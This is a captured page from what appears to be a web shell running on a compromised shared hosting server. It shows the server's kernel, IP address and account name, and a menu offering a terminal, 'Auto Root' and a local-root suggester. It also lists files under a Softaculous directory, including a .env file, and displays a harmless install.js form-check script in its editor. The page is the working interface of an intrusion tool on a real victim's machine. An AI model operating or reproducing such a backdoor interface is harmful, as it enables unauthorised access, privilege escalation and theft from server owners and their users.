Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
ninja /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
php53
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
php56
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
php71
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
php81
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
php82
[ DIR ]
drwxr-xr-x
2025-11-05 04:28
.env
1.36
KB
-rw-r--r--
2025-02-05 04:34
clone.php
9.87
KB
-rw-r--r--
2025-11-04 07:21
edit.php
4.23
KB
-rw-r--r--
2025-11-04 07:21
edit.xml
447
B
-rw-r--r--
2021-12-23 06:54
extend.php
9.04
KB
-rw-r--r--
2025-11-04 07:21
fileindex.php
588
B
-rw-r--r--
2025-09-04 08:27
import.php
5.56
KB
-rw-r--r--
2025-11-04 07:21
info.xml
4.73
KB
-rw-r--r--
2025-11-04 07:14
install.js
921
B
-rw-r--r--
2021-12-23 06:54
install.php
8.95
KB
-rw-r--r--
2025-11-04 07:21
install.xml
1.02
KB
-rw-r--r--
2024-07-10 03:40
md5
2.14
KB
-rw-r--r--
2025-11-04 07:21
ninja.sql
457.54
KB
-rw-r--r--
2025-11-04 07:14
ninja.zip
72.31
MB
-rw-r--r--
2025-11-04 07:14
notes.txt
2.03
KB
-rw-r--r--
2024-10-23 03:12
soft_delete.php
3.12
KB
-rw-r--r--
2021-12-23 06:54
update_pass.php
541
B
-rw-r--r--
2021-12-23 06:54
upgrade.php
7.83
KB
-rw-r--r--
2025-11-04 07:21
upgrade.xml
365
B
-rw-r--r--
2024-07-30 08:18
vendor.zip
86.72
MB
-rw-r--r--
2025-11-04 07:14
vendor1.zip
82.11
MB
-rw-r--r--
2025-11-04 07:14
Save
Rename
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; };